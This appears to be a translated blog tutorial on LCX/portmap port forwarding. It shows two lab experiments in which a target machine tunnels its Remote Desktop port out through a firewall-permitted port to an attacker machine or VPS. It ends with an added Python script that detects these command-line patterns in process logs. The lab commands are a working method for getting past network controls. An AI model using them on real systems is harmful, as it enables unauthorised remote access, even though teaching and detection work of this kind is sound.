Intranet tunnel proxy technology (2) LCX port forwarding

LCX port forwarding

Introduction to LCX

LCX is a port forwarding tool with a Windows version and a Linux version; the Linux version is called PortMap. LCX has two functions: port mapping and port forwarding. For example, when the target's port 3389 is open only internally and not to the outside world, port mapping can map port 3389 to another port on the target; when the target is on an internal network, or the target's policy only allows access to a fixed port, port forwarding can be used to get around the restriction.

LCX usage for Windows:

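Port forwarding:
lcx -listen <port listening for slave requests> <port waiting for connections>
lcx -slave <attack machine IP> <listening port> <target IP> <target port>
Port mapping:
lcx -tran <port waiting for connections> <target IP> <target port>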

LCX usage for Linux:

Usage: ./portmap -m method [-h1 host1] -p1 port1 [-h2 host2] -p2 port2 [-v] [-log filename]
-v: version
-h1: host1
-h2: host2
-p1: port1
-p2: port2
-log: log the data
-m: the action method for this tool
1: listen on PORT1 and connect to HOST2:PORT2
2: listen on PORT1 and PORT2
3: connect to HOST1:PORT1 and HOST2:PORT2

LCX experiment one

1. Experimental scene

The firewall is configured to allow only web access, so the attacker cannot reach port 3389 and a direct remote connection is not possible. LCX is therefore used for port forwarding.

The web server has port 80 open, and port 3389 is not allowed out of the network. Port 3389 of the web server can be forwarded to port 53, which is allowed out of the network. The attacker listens on port 53 locally and forwards it to port 1111. Connecting to the attacker's own port 1111 is then equivalent to accessing port 3389 of the web server.

2. Experimental environment

The machines are as follows:

Machine name      Machine IP
Attack machine    192.168.198.129
Web server        192.168.198.128

3. Experimental reproduction

1. Run the following command on the attack machine to listen on local port 53 and forward it to local port 1111

lcx.exe -listen 53 1111

2. Run the following command on the web server to forward its local port 3389 to port 53 of 192.168.198.129

lcx.exe -slave 192.168.198.129 53 127.0.0.1 3389

3. Start Remote Desktop on the attack machine, connect to 127.0.0.1:1111, and enter the credentials

4. You can now connect remotely to port 3389 of the web server at 192.168.198.128

5. As shown in the figure, the hack user successfully logs in to the web server remotely

LCX experiment two

1. Experimental scene

The intranet target machine has port 80 open, and port 3389 is not allowed out of the network. Port 3389 of the intranet target machine can be forwarded to port 54, which is allowed out of the network. The attacker listens on port 54 on the VPS and forwards it to port 1111. Connecting to port 1111 of the VPS is then equivalent to accessing port 3389 of the intranet target machine.

2. Experimental environment

Machine name                 Machine IP
Attacker VPS                 192.168.0.114
Intranet attacker machine    192.168.198.129
Intranet target machine      192.168.164.128

3. Experimental reproduction

1. Run the following command on the intranet target machine to forward its local port 3389 to port 54 of the VPS

lcx.exe -slave 192.168.0.114 54 127.0.0.1 3389

2. Run lcx.exe -listen 54 1111 on the VPS. Because my VPS is a Kali system, I use portmap:

./portmap -m 2 -p1 54 -p2 1111

3. On the intranet attacker machine, connect to 192.168.0.114:1111 and enter the account and password credentials

4. You can remotely access port 3389 of the intranet target machine

5. As shown in the figure, the hack user successfully logs in to the Web server remotely
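
For defenders, the commands used in both experiments have a fixed argument shape that shows up in process-creation logs. The following is an added example, not part of the original post: a Python check that keys on that shape rather than on the executable's file name. The log records, the SENSITIVE port set and all function names are assumptions made for illustration.

```python
SENSITIVE = {22, 445, 3389}  # assumption: forwarded service ports that raise severity

def _port(s):
    return s.isdigit() and 0 < int(s) < 65536

def _host(s):
    return bool(s) and not s.startswith("-") and not _port(s)

def _sensitive(args):
    return any(_port(a) and int(a) in SENSITIVE for a in args)

# Positional shapes from the usage text above: "p" = port, "h" = host or IP.
LCX_SHAPES = {"-listen": "pp", "-slave": "hphp", "-tran": "php"}

def classify(cmdline):
    """Return (mode, args, high_severity) if cmdline has an lcx/portmap shape, else None."""
    argv = cmdline.split()
    for i, tok in enumerate(argv):
        shape = LCX_SHAPES.get(tok.lower())
        if not shape:
            continue
        args = argv[i + 1:i + 1 + len(shape)]
        if len(args) == len(shape) and all(
                (_port if k == "p" else _host)(a) for k, a in zip(shape, args)):
            return tok.lower(), args, _sensitive(args)
    # portmap takes "-flag value" pairs; map each flag to the token that follows it.
    opts = {a.lower(): b for a, b in zip(argv, argv[1:]) if a.startswith("-")}
    p1, p2 = opts.get("-p1", ""), opts.get("-p2", "")
    if opts.get("-m") in {"1", "2", "3"} and _port(p1) and _port(p2):
        return "portmap -m " + opts["-m"], [p1, p2], _sensitive([p1, p2])
    return None

# Constructed process-creation records (host, command line); commands are those on this page.
SAMPLE_EVENTS = [
    ("192.168.198.129", "lcx.exe -listen 53 1111"),
    ("192.168.198.128", "lcx.exe -slave 192.168.198.129 53 127.0.0.1 3389"),
    ("192.168.0.114", "./portmap -m 2 -p1 54 -p2 1111"),
    ("192.168.198.128", r"C:\Windows\System32\svchost.exe -k netsvcs"),
]

def scan(events):
    """Yield (host, mode, args, high_severity) for every matching record."""
    for host, cmd in events:
        hit = classify(cmd)
        if hit:
            yield (host, *hit)

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The match is a heuristic on argument shape, so other tools that take a -listen option followed by two ports will also match and should be allow-listed per environment.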

Origin blog.csdn.net/qq_64973687/article/details/131154574